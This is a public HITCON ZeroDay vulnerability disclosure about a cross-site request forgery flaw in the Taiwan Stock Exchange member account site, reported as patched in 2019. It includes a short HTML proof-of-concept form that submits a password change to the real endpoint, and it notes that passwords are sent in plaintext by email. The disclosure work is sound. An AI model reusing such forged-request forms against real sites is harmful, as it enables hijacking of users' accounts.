台灣證卷交易所 CSRF - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2019-00250
  •  發信 Vendor: 臺灣證券交易所股份有限公司
  • Title: 台灣證卷交易所 CSRF
  • Introduction: Cross-Site Request Forgery

處理狀態

目前狀態

公開
Last Update : 2019/05/01
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 已複測
  • 公開

處理歷程

  • 2019/03/15 12:32:56 : 新提交 (由 Noth 更新此狀態)
  • 2019/03/15 16:42:42 : 新提交 (由 Noth 更新此狀態)
  • 2019/03/15 22:49:21 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/03/16 11:14:11 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/03/16 11:14:11 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/04/24 10:13:32 : 複測申請中 (由 組織帳號 更新此狀態)
  • 2019/04/27 10:18:27 : 確認已修補 (由 Noth 更新此狀態)
  • 2019/05/01 03:00:04 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2019-00250
  • 通報者:Cake7528064 (Noth)
  • 風險:中
  • 類型:跨站冒名請求 (Cross-Site Request Forgery, CSRF)

參考資料

攻擊者可經由該漏洞惡意操控使用者帳號進行惡意行為。

漏洞說明: OWASP - Cross-Site Request Forgery (CSRF)
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

防禦措施: OWASP - Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

http://member.twse.com.tw/account/

敘述

攻擊者能構造相同的表單(Code)
沒有token做驗證,造成CSRF。

PoC : 
<html>
<head>
</head>
<body>
       <form id="password" method="POST" action="http://member.twse.com.tw/account/member/changePasswordAction">
          <input type="password" name="password" placeholder="原有之舊密碼" autocomplete="off" class="input-text"><br>
          <input type="password" name="password1" placeholder="新的密碼" autocomplete="off" class="input-text">
          <input type="password" name="password2" placeholder="再次輸入相同新密碼" autocomplete="off" class="input-text"><br>
          <div class="hints">密碼條件:長度 6 碼以上、要同時包含數字及字母、容許鍵盤符號、不可為中文或全形符號。注意大小寫不同。</div>
          <div class="center"style="margin: 40px 0 20px 0;">
            <input type="submit" value="變更密碼" class="submit-button">
          </div>
        </form>
</body>
</html>

此外發現"忘記密碼" 回傳Gmail時,是以明碼回傳 ( 來個Hash如何,如果我知道別人的帳號或許能直接改掉別人密碼,需加驗證。

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;